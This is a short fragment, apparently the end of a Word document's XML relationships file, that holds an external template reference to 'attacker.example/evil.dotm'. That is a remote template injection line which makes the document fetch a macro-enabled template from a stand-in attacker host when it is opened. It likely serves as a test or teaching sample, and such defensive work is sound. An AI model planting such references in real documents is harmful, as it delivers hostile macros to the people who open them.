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http://attacker.example/evil.dotm" TargetMode="External"/></Relationships>
</file>